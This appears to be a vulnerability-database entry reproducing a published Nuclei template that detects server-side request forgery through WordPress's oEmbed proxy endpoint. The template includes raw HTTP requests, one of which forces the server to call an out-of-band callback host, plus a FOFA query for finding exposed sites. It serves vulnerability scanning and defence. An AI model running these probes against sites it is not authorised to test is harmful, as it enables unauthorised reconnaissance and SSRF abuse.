漏洞描述
The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.
wordpress-ssrf-oembed: Wordpress Oembed Proxy - Server-side request forgery
PoC代码[已公开]
id: wordpress-ssrf-oembed
info:
name: Wordpress Oembed Proxy - Server-side request forgery
author: dhiyaneshDk
severity: medium
description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.
reference:
- https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html
- https://github.com/incogbyte/quickpress/blob/master/core/req.go
classification:
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: wordpress
product: wordpress
fofa-query: body="oembed" && body="wp-"
tags: wordpress,ssrf,oast,oembed,vuln
http:
- raw:
- |
GET /wp-json/oembed/1.0/proxy HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- 'rest_missing_callback_param'
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4a0a00473045022100b75f27deeb2e93697c25440c822f8c868943179c9342d5c6eaed272614e24fd1022029a429bc2a01f3e5461ef4666342d7ae2491d2a51dd91f5de7c0ad9ac68eefde:922c64590222798bb761d5b6d8e72950